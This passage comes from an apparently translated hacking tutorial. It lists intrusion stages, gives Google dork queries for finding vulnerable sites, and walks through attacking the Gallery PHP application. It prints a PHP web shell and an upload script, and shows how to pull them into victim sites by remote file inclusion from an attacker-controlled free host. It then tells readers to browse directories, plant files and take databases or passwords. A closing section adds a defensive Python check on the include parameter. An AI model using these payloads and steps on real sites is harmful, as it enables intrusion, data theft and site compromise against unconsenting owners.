+ Enumeration (listing to find holes): the third step is looking for poorly protected resources, or user accounts that can be used to get in. This includes default passwords, default scripts and services. Many network administrators do not know about them or do not change these values.
+ Gaining Access: now the intruder tries to get into the network using the information obtained in the three steps above. The methods used here can be attacking a buffer overflow bug, obtaining and decrypting the password file, or, most primitively, brute-forcing (trying every possibility for) the password. Tools commonly used at this step are NAT, podium or L0pht.
+ Escalating Privileges: for example, if the hacker got into the network with a guest account, he will look for a way to control the whole system. The hacker will try to ***** the admin's password or use a privilege-escalation hole. John and Riper are two password-cracking programs that are often used.
+ Pilfering (used when the files holding passwords are exposed): once again search engines are used to find ways into the network. Text files containing passwords or other insecure mechanisms can be easy prey for the hacker.
+ Covering Tracks: after getting the information needed, the hacker tries to erase traces, deleting the operating system's log files so the administrator does not notice the system was broken into, or if he does, cannot find out who the intruder was.
+ Creating Back Doors (preparing so that the next intrusion is easier): the hacker leaves back doors, that is a mechanism that lets him come back through a secret path without much effort, by installing a Trojan or creating a new user (in organisations with many users). Tools here are the various Trojans and keyloggers.
+ Denial of Service (DoS): if the intrusion fails, DoS is the last means of attacking the

system. If the system is not configured properly, it will crash and let the hacker in. Otherwise DoS will make the system stop working. Tools often used for DoS attacks are trin00, Ping Of Death, teardrop and the various nukers and flooders. This method is very potent and is still widely used today.
_ Depending on their understanding and skill level, a hacker may skip some step. It is not necessary to follow them in order. Remember the saying: know your enemy and know yourself, and you will win a hundred battles. (Documents from HVA and hackervn.net)

29.) How to find vulnerable websites:
_ You surely know the websites that specialise in searching for information on the net? But you probably would not guess that we can use them to find vulnerable websites (I usually use google.com and recommend that you use it too; it is very powerful and effective).
_ If you are interested in website bugs and want to find them, just go to google.com and type the vulnerable path after allinurl:. For example, with the vulnerable path cgi-bin/php.cgi?/etc/passwd you type: allinurl:cgi-bin/php.cgi?/etc/passwd. It will list the websites with this bug; look at the last line of each result (the green address line): if a line reads exactly like the keyword you typed, that site is or was vulnerable. Whether you can get in still depends on whether the site has fixed the bug.
_ If you are interested in forum bugs and want forums of some type to practise on, just type the keyword powered by; for example, to find forums using Snitz 2000: powered by Snitz 2000
_ However, finding the right vulnerable forum or website this way has a low success rate; pay attention to the special string in the URL that is characteristic of each kind of website or forum (this is very important; study it further yourselves). For example, to find the Hosting Controller bug the characteristic strings are /admin, /advadmin or /hosting, so we type the keyword:

allinurl:/advadmin or allinurl:/admin or allinurl:/hosting
It will list the websites whose URL looks like: http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting. For UBB forums the characteristic string is cgi-bin/ultimatebb.cgi? and we search the same way. Once you know how to search like this, later you only need to follow the updates in HVA's Security Bugs section, which LeonHart posts daily, and you will understand what they mean and check them yourselves.

30.) Technique for hacking the web through the Gallery bug (a form of PHP code injection):
_ Gallery is a tool for creating photo galleries on the web, written in PHP; by abusing this hole we can add PHP code of our own that lets us upload, which is our main goal.
_ First register a free host; brinkster.com is the easiest. Then open Notepad and create a PHP file with the following code:
CODE
<?php
// Relies on register_globals: $act and $shell come straight from the request.
global $PHP_SELF;
echo "<form method=post action=\"$PHP_SELF?$QUERY_STRING\">
<input type=text name=shell size=40>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>";
set_magic_quotes_runtime(1);
if ($act == "shell") {
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
    system($shell);
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
}
echo "";
?>

Make 2 files from this code with different names (but the same code) and name them:
+ shellphp.php: this file is used to run a shell on the victim host.
+ init.php: this file is used to upload to the host page you have just created. (Upload this init.php early; we will need it later but with different code. If you forget to upload this file, it's over.)
Create one more PHP file with the following code:
CODE
<?php
// Saves the file posted in the "userfile" form field next to *PATH*, which is
// filled in later. $act comes from the request under register_globals.
function handleupload()
{
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        $filename = $_FILES['userfile']['tmp_name'];
        print "$filename was uploaded successfuly";
        $realname = $_FILES['userfile']['name'];
        print "realname is $realname\n";
        print "copying file to uploads dir " . $realname;
        copy($_FILES['userfile']['tmp_name'], "*PATH*" . $realname); // note: we will change *PATH* later
    } else {
        echo "Possible file upload attack: filename " . $_FILES['userfile']['name'] . ".";
    }
}
if ($act == "upload") {
    handleupload();
}
echo "<form ENCTYPE=multipart/form-data method=post action=\"$PHP_SELF?$QUERY_STRING\">
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>";
?>
Name it upload.php; it will be uploaded to the victim's website.
_ Next, go to Google, type Powered by gallery and press Enter; Google will list a pile of sites that use Gallery. Pick any one and use the following link to test whether it still has the Gallery bug:
http://<victim website>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

If you see a rectangle at the very top with a button labelled Go on its right, consider that you have found a target. Now you can type commands through that rectangle to hack the victim's site. First type the command pwd to find the absolute path of the current directory and press Go; when it shows the result, quickly note down the path shown below (in my example I will use the path I found, /home/abc/xyz/gallery). Then type the command ls -a to list its subdirectories. Now look at the result; you will see a pile of subdirectories listed. Always remember that our goal is to find a directory that can be used to upload the upload.php file we prepared earlier, so identify a suitable one by looking at the last characters of each result line:
+ Rule out the entries that are . or .., since these are the root or virtual directories (they are usually at the top of the result lines).
+ Also rule out the lines whose last word has an extension (e.g. config.php, check.inc, etc.), since these are files, not directories.
+ What remains are the directories we can upload into, but I advise you to pick lines where the directory name is preceded by a number greater than 1 (you can see it in the second column from the left), because that both confirms it is a real directory and not a virtual one, and makes it harder for the site's admin to notice when we plant our file. In my example I found the directory loveyou containing 12 files that we can upload into, so the official path we upload to will be: /home/abc/xyz/Gallery/loveyou
Now go into your host account and edit init.php so its contents match the code of upload.php, but change *PATH* to /home/abc/xyz/gallery/loveyou/. At the same time prepare an upload.php on your own machine with *PATH* set to "" (two double quotes). Now we can upload upload.php to the victim's site; enter the following address in your browser:
http://<victim website>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /
You will see another rectangular box appear with 2 buttons beside it, a Browse button and an Upload button. Use Browse to point to the upload.php file you prepared on your machine; when you press Upload it uploads upload.php to the victim's website.
Ok, now consider the path of hacking the site complete. From here on apply what you have learned to attack the opponent, such as taking the database or passwords (do the same as in the earlier hacking guides), but you should only practise and not delete their database or deface their site. If you are a true hacker you only need to upload to the site the words: Hack by .. and that is enough. As in previous times, whether you succeed depends on your luck and on persistently researching and applying your knowledge. (Based on the hacking guide of big brother vnofear at viethacker.net) GOODLUCK!!!!!!!!!!!!
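The Gallery bug above works because the script builds an include path from a request parameter (GALLERY_BASEDIR) and the interpreter will happily fetch a remote URL or follow a path outside the application directory. The validation a defender puts in front of such a parameter is the point worth showing. The following Python is an added example, not code from Gallery or from the tutorial: it refuses URL schemes, protocol-relative paths and NUL bytes, resolves the value against the application root with pure path logic (so the check runs without a filesystem), rejects anything that escapes the root, and accepts only directories on an allow-list. The root /home/abc/xyz/gallery is the path from the walkthrough above; the allow-list of subdirectories is a constructed assumption.

```python
"""Validate a user-supplied base directory before using it in an include path.

Added example; not code from Gallery or from the tutorial. APP_ROOT is the
path used in the walkthrough above; ALLOWED_SUBDIRS is a constructed
allow-list standing in for the directories an application really includes.
"""
import posixpath
import re
from typing import Iterable

APP_ROOT = "/home/abc/xyz/gallery"
ALLOWED_SUBDIRS = ("albums", "themes")
# Anything that starts with a scheme (http:, ftp:, php:, data:, ...) is a remote
# or stream-wrapper location, never a directory under the application.
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")


class UnsafeBaseDir(ValueError):
    """Raised when the supplied value must not be used as an include base."""


def resolve_basedir(value: str, app_root: str = APP_ROOT,
                    allowed: Iterable[str] = ALLOWED_SUBDIRS) -> str:
    """Return the absolute directory for `value`, or raise UnsafeBaseDir."""
    if "\x00" in value:
        raise UnsafeBaseDir("NUL byte in path")
    if SCHEME_RE.match(value) or value.startswith("//"):
        raise UnsafeBaseDir("remote or stream-wrapper path refused")
    # normpath collapses "." and ".." so an escape shows up as a prefix mismatch.
    candidate = posixpath.normpath(posixpath.join(app_root, value))
    root = app_root.rstrip("/") + "/"
    if not candidate.startswith(root):
        raise UnsafeBaseDir("path escapes the application root")
    first_component = candidate[len(root):].split("/", 1)[0]
    if first_component not in set(allowed):
        raise UnsafeBaseDir("directory not on the allow-list")
    return candidate


def classify_basedir(value: str) -> str:
    """Convenience wrapper: 'ok:<path>' or 'refused:<reason>' for a given value."""
    try:
        return "ok:" + resolve_basedir(value)
    except UnsafeBaseDir as exc:
        return "refused:" + str(exc)


# Constructed inputs: the shapes seen in the walkthrough plus a few benign ones.
SAMPLE_VALUES = [
    "albums",
    "albums/2002",
    "albums/../themes/x",
    "http://wwwxx.brinkster.com/dir/",
    "//evil-host/share",
    "../../../etc",
    "/etc/passwd",
    "uploads",
    "php://input",
]

if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        print(f"{v!r:35} -> {classify_basedir(v)}")
```

The allow-list is what makes the check robust: prefix comparison alone still lets an attacker point the include at any directory they can write to under the root, which is exactly the upload-then-include sequence the walkthrough relies on.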